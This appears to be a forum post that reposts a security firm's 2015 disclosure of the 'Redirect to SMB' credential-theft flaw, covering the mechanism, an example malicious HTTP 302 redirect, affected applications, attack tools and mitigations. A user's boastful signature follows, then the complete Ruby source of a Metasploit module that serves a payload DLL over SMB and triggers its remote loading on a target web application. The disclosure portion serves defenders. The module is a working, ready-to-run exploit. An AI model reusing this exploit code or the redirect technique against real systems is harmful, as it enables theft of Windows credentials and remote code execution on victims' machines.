Search the Community

SPEAR - Redirect to SMB April 13, 2015 By Brian Wallace We’ve uncovered a new technique for stealing sensitive login credentials from any Windows PC, tablet or server, including ones running previews of the yet-to-be-released Windows 10 operating system. Software from at least 31 companies including Adobe, Apple, Box, Microsoft, Oracle and Symantec can be exploited using this vulnerability, which we have dubbed Redirect to SMB. Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue. Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password. We are publishing a white paper that describes the issue in detail, and offers mitigation methods for both developers and computer users. For technical details, download the Redirect To SMB white paper. Original Attack The Redirect to SMB attack builds on a vulnerability discovered in 1997 by Aaron Spangler, who found that supplying URLs beginning with the word “file” (such as file://1.1.1.1/) to Internet Explorer would cause the operating system to attempt to authenticate with a SMB server at the IP address 1.1.1.1. It’s a serious issue because stolen credentials can be used to break into private accounts, steal data, take control of PCs and establish a beachhead for moving deeper into a targeted network. These “file” URLs could be provided as an image, iframe, or any other web resource resolved by the browser. We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server. RedirectToSMB-Diagram-1 While conducting previous research on network protocols, we had experimented with redirecting ordinary HTTP requests to web servers to identify new attacks. So we were curious to see what threats SMB posed when combined with redirects. We created an HTTP server in Python that answered every request with a simple HTTP 302 status code to redirect clients to a file:// URL, and using that we were able to confirm that an http:// URL could lead to an authentication attempt from the OS. GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0,( Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Endoding: gzip, deflate Host: 192.168.36.207 DNT: 1 Connection: Keep-Alive HTTP/1.1 302 Found Content-Type: text/html Location: file://192.168.36.207/mitmproxy-identifier Content-Length: 0 RedirectToSMB-Diagram-02 Increased Attack Surface We identified four commonly used Windows API functions that allow for redirection from HTTP/HTTPS to SMB. Early testing found that they are used by a wide range of software features such as updaters and usage reporting tools. This discovery opened up a wide range of new attack methods. When combined with a man-in-the-middle attack, an attacker can force authentication attempts with an SMB server using susceptible applications and services that transmit data over HTTP or HTTPS. RedirectToSMB-Diagram-03 Affected Applications We tested dozens of application in our lab, uncovering 31 vulnerable software packages, which we disclosed to CERT at Carnegie Mellon University on Feb. 27, 2015. They include: Widely Used Applications: Adobe Reader, Apple QuickTime and Apple Software Update (which handles the updating for iTunes) Microsoft Applications: Internet Explorer, Windows Media Player, Excel 2010, and even in Microsoft Baseline Security Analyzer Antivirus: Symantec’s Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus Security Tools: .NET Reflector, Maltego CE Team Tools: Box Sync, TeamViewer Developer Tools: Github for Windows, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer Impact Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic. Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB attacks on shared WiFi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools. Examples The following examples show different attacks that could be conducted. In order to effectively demonstrate attack scenarios, the conditions have been simplified. The following are the IP addresses of the computers in the examples: • 192.168.36.207 – The Attacker • 192.168.36.247 – The Victim • 192.168.36.128 – The Router/Internet Gateway The tools in the examples are as follows: • SMBTrap2 • SMBTrap-mitmproxy-inline.py • MITMProxy • Zarp Additional attack examples are discussed in the white paper. Attacking AVG via ARP Poisoning Attacking Microsoft Baseline Security Analyzer via modified DNS record Encrypted Credentials While the user credentials sent over SMB are commonly encrypted, the encryption method used was devised in 1998 and is weak by today’s standards. A stronger hashing algorithm being used on these credentials would decrease the impact of this issue, but not as much as disabling automatic authentication with untrusted SMB servers. With roughly $3,000 worth of GPUs, an attacker could crack any 8-character password consisting of letters (upper and lower case) as well as numbers in less than half a day. Mitigations Microsoft has yet to release a patch to fix the Redirect to SMB vulnerability. The simplest workaround is to block outbound traffic from TCP 139 and TCP 445 -- either at the endpoint firewall or at the network gateway’s firewall (assuming you are on a trusted network). The former will block all SMB communication, which may disable other features that depend on SMB. If the block is done at the network gateway’s firewall, SMB features will still work inside the network, but prevent authentication attempts with destinations outside the network. See the white paper for other mitigation steps. Microsoft did not resolve the issue reported by Aaron Spangler in 1997. We hope that our research will compel Microsoft to reconsider the vulnerabilities and disable authentication with untrusted SMB servers. That would block the attacks identified by Spangler as well as the new Redirect to SMB attack. NO-MERCY Me & i & My self -> lIKE mICROSOFT :) Source ; SPEAR - Redirect to SMB & yOU Can See this Post too ; 18-year-old Unpatched Vulnerability Affects All Versions of Microsoft Windows

This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This Metasploit module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Generic Web Application DLL Injection', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a HTTP request triggers a DLL load from an specified SMB share. This module serves payloads as DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would trigger the load of the DLL. }, 'Author' => [ 'Matthew Hall <hallm[at]sec-1.com>' ], 'Platform' => 'win', 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X86_64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['CWE', '427'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, # Default target is 32-bit as we usually inject into 32bit processes 'DisclosureDate' => 'Mar 04 2015' )) register_options( [ OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']), OptString.new('TARGETURI', [true, 'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]) ], self.class) deregister_options('FILE_CONTENTS') end def setup super self.file_contents = generate_payload_dll self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" print_status("File available on #{unc}...") end def primer sploit = target_uri.to_s sploit << unc print_status("#{peer} - Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit }, 3) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end